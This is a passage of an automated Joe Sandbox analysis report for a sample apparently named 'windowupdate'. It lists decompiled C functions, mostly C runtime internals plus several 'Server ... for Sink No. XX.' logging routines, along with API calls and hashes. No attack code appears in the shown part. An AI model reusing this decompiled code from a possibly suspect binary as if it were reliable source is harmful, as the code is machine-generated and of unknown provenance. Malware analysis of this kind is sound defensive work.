                      				return _t13;
                      			}

                      APIs
                      • WriteConsoleW.KERNEL32(00DB3E47,?,?,00000000,?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?), ref: 00DBD022
                      • GetLastError.KERNEL32(?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?,?,?,?,00DB4B29,?,?), ref: 00DBD02E
                        • Part of subcall function 00DBCFF4: CloseHandle.KERNEL32(FFFFFFFE,00DBD03E,?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?,?,?,?,00DB4B29), ref: 00DBD004
                      • ___initconout.LIBCMT ref: 00DBD03E
                        • Part of subcall function 00DBCFB6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DBCFE5,00DB9724,?,?,00DB3E47,?), ref: 00DBCFC9
                      • WriteConsoleW.KERNEL32(00DB3E47,?,?,00000000,?,?,00DB9737,00DB3E47,00000001,?,?,?,00DB3E47,?), ref: 00DBD053
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: 7165de91c9a70dd6307eaadf187160c8722449a4aee4bd36e9bb171c3140bc7a
                      • Instruction ID: 65480a14bd9a7674b7f3a5b425ad8c966016246b0bc8c62d57208605148db3c4
                      • Opcode Fuzzy Hash: 7165de91c9a70dd6307eaadf187160c8722449a4aee4bd36e9bb171c3140bc7a
                      • Instruction Fuzzy Hash: A2F0983650122ABBCF222FD59C04ADA3E66FF097E1B058555FA1AD5260D632D820EBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D9EB30(intOrPtr* __ecx, void* __edi) {
                      				intOrPtr* _v8;
                      				char _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _t49;
                      				intOrPtr _t78;
                      
                      				_v8 = __ecx;
                      				_t49 = _v8;
                      				_t78 = _v8;
                      				_t4 = _t49 + 4; // 0x7400f87d
                      				_t5 = _t78 + 8; // 0x8b026a13
                      				if( *_t4 ==  *_t5) {
                      					if( *_v8 != 0) {
                      						_t20 = _v8 + 8; // 0x8b026a13
                      						_v16 =  *_t20 -  *_v8 >> 2;
                      						if(_v16 <= 0x7fffffff) {
                      							_v20 = _v16 << 1;
                      							if((E00D8C099(E00D8B480( &_v12, E00D897D0(_v20, __edi,  *_v8, _v20, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x67)),  &_v12) & 0x000000ff) != 0) {
                      								 *_v8 = E00D8B610( &_v12);
                      								 *((intOrPtr*)(_v8 + 4)) =  *_v8 + _v16 * 4;
                      								 *((intOrPtr*)(_v8 + 8)) =  *_v8 + _v20 * 4;
                      								_v32 = 0;
                      								E00D8B4E0( &_v12);
                      								return _v32;
                      							}
                      							_v28 = 0xc;
                      							E00D8B4E0( &_v12);
                      							return _v28;
                      						}
                      						return 0xc;
                      					}
                      					_v36 = 4;
                      					 *_v8 = E00D8B610(E00D8B480( &_v24, L00D892C0(_t78, __edi, 4, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x57)));
                      					E00D8B4E0( &_v24);
                      					if( *_v8 != 0) {
                      						 *((intOrPtr*)(_v8 + 4)) =  *_v8;
                      						 *((intOrPtr*)(_v8 + 8)) =  *_v8 + 0x10;
                      						return 0;
                      					}
                      					return 0xc;
                      				}
                      				return 0;
                      			}

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9EB78
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 00D9EB61, 00D9EBF6
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                      • API String ID: 4219598475-2801755846
                      • Opcode ID: 494daa2ea1defe69f7d14eeb8e0aa82ec707eb83bb5f1b76d480f9b88ed33172
                      • Instruction ID: 0f069d16d1ee55a48555a4d5b3ffa7fb69fdc017c83969165f8864b83c129796
                      • Opcode Fuzzy Hash: 494daa2ea1defe69f7d14eeb8e0aa82ec707eb83bb5f1b76d480f9b88ed33172
                      • Instruction Fuzzy Hash: 2C41FE74A00109EFDB14EF98C992EAEB7B1FF44314F248199E5156B396DB30AE41DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D4C690(void* __edi) {
                      				char _v8;
                      				char _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _t32;
                      				intOrPtr _t45;
                      				intOrPtr _t70;
                      				intOrPtr _t77;
                      
                      				if( *0xdf6020 != 0xffffffff) {
                      					E00D4C490( &_v12);
                      					_t32 =  *0xdf6020; // 0x5
                      					_v16 = E00D5B300(_t32);
                      					if(_v16 != 0xffffffff) {
                      						if(_v16 == 0) {
                      							_t77 =  *0xdf6020; // 0x5
                      							if(E00D5B340(_t77, 0xffffffff) != 0) {
                      								E00D4C470( &_v8, L00D892C0( &_v12, __edi, 1, 0x28, 2, "d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\internal\\per_thread_data.cpp", 0x80));
                      								if((E00D4C4F0( &_v8) & 0x000000ff) != 0) {
                      									if((E00D4C5B0(E00D4C540( &_v8)) & 0x000000ff) != 0) {
                      										_v40 = E00D4C510( &_v8);
                      										E00D4C4B0( &_v8);
                      										E00D4C4D0( &_v12);
                      										return _v40;
                      									}
                      									_t45 =  *0xdf6020; // 0x5
                      									E00D5B340(_t45, 0);
                      									_v36 = 0;
                      									E00D4C4B0( &_v8);
                      									E00D4C4D0( &_v12);
                      									return _v36;
                      								}
                      								_t70 =  *0xdf6020; // 0x5
                      								E00D5B340(_t70, 0);
                      								_v32 = 0;
                      								E00D4C4B0( &_v8);
                      								E00D4C4D0( &_v12);
                      								return _v32;
                      							}
                      							_v28 = 0;
                      							E00D4C4D0( &_v12);
                      							return _v28;
                      						}
                      						_v24 = _v16;
                      						E00D4C4D0( &_v12);
                      						return _v24;
                      					}
                      					_v20 = 0;
                      					E00D4C4D0( &_v12);
                      					return _v20;
                      				}
                      				return 0;
                      			}

                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 00D4C729
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                      • API String ID: 0-1094830976
                      • Opcode ID: df49e4f9efd6163d6eaa5c895c4bd92b26ce7bbe2d40e53df23db93b05098e20
                      • Instruction ID: 55355c286bdcc7c42817d04c688ab7ba180a5dddaa22c0b99974702fee6d540c
                      • Opcode Fuzzy Hash: df49e4f9efd6163d6eaa5c895c4bd92b26ce7bbe2d40e53df23db93b05098e20
                      • Instruction Fuzzy Hash: 4F315E70D21208ABCB84EBA0D952BFE7774EF10305F105199E416B71D1EB74AB04CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00DC0840(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0xdc5680);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xdf600c; // 0x71e60372
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00D31AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00D82DE0( &_v144, 0x64, "Server Walking for Sink No. XX.");
                      				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = E00D32F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xf0000ff
                      				E00D45CB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E00D330B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E00DC14C0(_t65, 0xdc0944);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC08AE
                        • Part of subcall function 00D45CB0: VariantInit.OLEAUT32(?), ref: 00D45DA4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0912
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Walking for Sink No. XX., xrefs: 00DC08A0
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Walking for Sink No. XX.
                      • API String ID: 2532982526-2197370697
                      • Opcode ID: 5de41d8749e367caa2d51b617a13bee200d934e2ec797c4784ad8f9cb32deb70
                      • Instruction ID: 08703af212d815b07acdac156a0b6f594986620a2b4f55df410d4453b84fef22
                      • Opcode Fuzzy Hash: 5de41d8749e367caa2d51b617a13bee200d934e2ec797c4784ad8f9cb32deb70
                      • Instruction Fuzzy Hash: 23219D71E042099FDB14EF64DC41BAEB7B4FB08310F4042A9E519A3382DB756A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00DC0980(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0xdc56ba);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xdf600c; // 0x71e60372
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00D31AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00D82DE0( &_v144, 0x64, "Server Paddling for Sink No. XX.");
                      				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = E00D32F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xff9bc2e8
                      				E00D45AB0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E00D330B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E00DC14C0(_t65, 0xdc0a84);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC09EE
                        • Part of subcall function 00D45AB0: VariantInit.OLEAUT32(?), ref: 00D45BA4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0A52
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Paddling for Sink No. XX., xrefs: 00DC09E0
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Paddling for Sink No. XX.
                      • API String ID: 2532982526-3374743945
                      • Opcode ID: f8dbf8b44bc5ebfb0296e0c662ddfffa0f6dda6f4c43ba8584c4f04bbb333e4e
                      • Instruction ID: d50a6e7a4f44f2c4e82c05f72ef63b8bac4611c4d1f1caa0fde7775eec356c0d
                      • Opcode Fuzzy Hash: f8dbf8b44bc5ebfb0296e0c662ddfffa0f6dda6f4c43ba8584c4f04bbb333e4e
                      • Instruction Fuzzy Hash: ED216DB1E042099FDB14EF54DC52BAEB7B4FB04310F5042A9E519A7382DB796A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00DC0AC0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0xdc56f4);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xdf600c; // 0x71e60372
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00D31AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00D82DE0( &_v144, 0x64, "Server Flapping for Sink No. XX.");
                      				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = E00D32F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xb70f0000
                      				E00D458B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E00D330B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E00DC14C0(_t65, 0xdc0bc4);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC0B2E
                        • Part of subcall function 00D458B0: VariantInit.OLEAUT32(?), ref: 00D459A4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0B92
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Flapping for Sink No. XX., xrefs: 00DC0B20
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Flapping for Sink No. XX.
                      • API String ID: 2532982526-3528622240
                      • Opcode ID: a3ed391b876a907992625f98198570f9fbbdbc409ade88b982bef9a4ad2f14cb
                      • Instruction ID: d8d3576cb5f4f7a50e9fe8398fd3606ae588b7038d7b2aa5b3c93a57047ba345
                      • Opcode Fuzzy Hash: a3ed391b876a907992625f98198570f9fbbdbc409ade88b982bef9a4ad2f14cb
                      • Instruction Fuzzy Hash: E7219DB1E042099FDB14EF54DC51BAEB7B8FF04310F4042A9E419A7382DB756A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 59%
                      			E00DC0C00(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _v8;
                      				char _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				char _v144;
                      				char _v156;
                      				void _v164;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t33;
                      				void* _t38;
                      				intOrPtr _t45;
                      				void* _t56;
                      				void* _t59;
                      				void* _t63;
                      				signed int _t65;
                      				void* _t66;
                      
                      				_t56 = __edx;
                      				_push(0xffffffff);
                      				_push(0xdc572e);
                      				_push( *[fs:0x0]);
                      				_push(__edi);
                      				_push(__ecx);
                      				memset( &_v164, 0xcccccccc, 0x25 << 2);
                      				_pop(_t45);
                      				_t26 =  *0xdf600c; // 0x71e60372
                      				_t27 = _t26 ^ _t65;
                      				_v20 = _t27;
                      				 *[fs:0x0] =  &_v16;
                      				_v24 = _t45;
                      				_v28 = 0;
                      				_v32 = E00D31AB0();
                      				_v36 = 0;
                      				_v40 = 0;
                      				E00D82DE0( &_v144, 0x64, "Server Quacking for Sink No. XX.");
                      				E00D44B80(__ebx,  &_v156, _t56,  &_v164 + 0x25, __esi,  &_v144);
                      				_v8 = 0;
                      				_t33 = E00D32F30( &_v156);
                      				_t16 = _v24 + 0x24; // 0xf0000ff
                      				E00D456B0(__ebx,  *_t16,  &_v164 + 0x25, __esi, _t33);
                      				_v164 = 1;
                      				_v8 = 0xffffffff;
                      				E00D330B0( &_v156, __esi);
                      				_push(_v24);
                      				_push(_v164);
                      				E00DC14C0(_t65, 0xdc0d04);
                      				_pop(_t38);
                      				_pop(_t59);
                      				 *[fs:0x0] = _v16;
                      				_t63 = _t27;
                      				return E00DC1520(E00D47280(_t38, __ebx, _v20 ^ _t65, _t59, _t63, __esi), _t65 - _t66 - 0x94 + 0xb8);
                      			}

                      APIs
                      • __aligned_msize.LIBCMTD ref: 00DC0C6E
                        • Part of subcall function 00D456B0: VariantInit.OLEAUT32(?), ref: 00D457A4
                        • Part of subcall function 00D330B0: SysFreeString.OLEAUT32 ref: 00D330C7
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DC0CD2
                        • Part of subcall function 00DC14C0: _RTC_StackFailure.LIBCMTD ref: 00DC1501
                      Strings
                      • Server Quacking for Sink No. XX., xrefs: 00DC0C60
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Stack$CheckFailureFreeInitStringVariantVars@8__aligned_msize
                      • String ID: Server Quacking for Sink No. XX.
                      • API String ID: 2532982526-3989898170
                      • Opcode ID: 7f2ce0266e172ba64458da58f639bb63f48f59e08ce6d2864685c4ac3bc108b7
                      • Instruction ID: 674280895c7b28616f076b04f154eecd6614e0aa81d7a0488e7bd81856aba64e
                      • Opcode Fuzzy Hash: 7f2ce0266e172ba64458da58f639bb63f48f59e08ce6d2864685c4ac3bc108b7
                      • Instruction Fuzzy Hash: E3216DB1E042199FDB14EF54DC51BAEB7B8FF04310F5042A9E419A7382DB756A48CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00D580D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char* _t15;
                      				intOrPtr _t36;
                      				intOrPtr _t37;
                      
                      				_t15 =  *0xf20640; // 0x0
                      				if( *_t15 != 0) {
                      					_push("??_C");
                      					_v8 = E00D4EFF0() - 1;
                      					_t36 =  *0xf20640; // 0x0
                      					_v12 = _t36;
                      					if(E00D92B40(_v12, "??_C", _v8) != 0) {
                      						E00D4F350(_a4, 2);
                      						return _a4;
                      					}
                      					_push("??_C");
                      					_v20 = E00D4EFF0() - 1;
                      					_t37 =  *0xf20640; // 0x0
                      					_v16 = _t37;
                      					 *0xf20640 = _v16 + _v20;
                      					_push(1);
                      					E00D57F80(__ebx, __edi, __esi, _a4, 0);
                      					return _a4;
                      				}
                      				E00D4F350(_a4, 1);
                      				return _a4;
                      			}











                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D580E7
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::Node::makeStatus
                      • String ID: ??_C
                      • API String ID: 637594406-1959642359
                      • Opcode ID: e55f7ef8def0e8a80470682203783a1506b96e833417427687e1a04430de6c1f
                      • Instruction ID: 042c95a0ddaedb5466e6e22cf0847ee31549d5096a1d85f3fd42f73623ce13a6
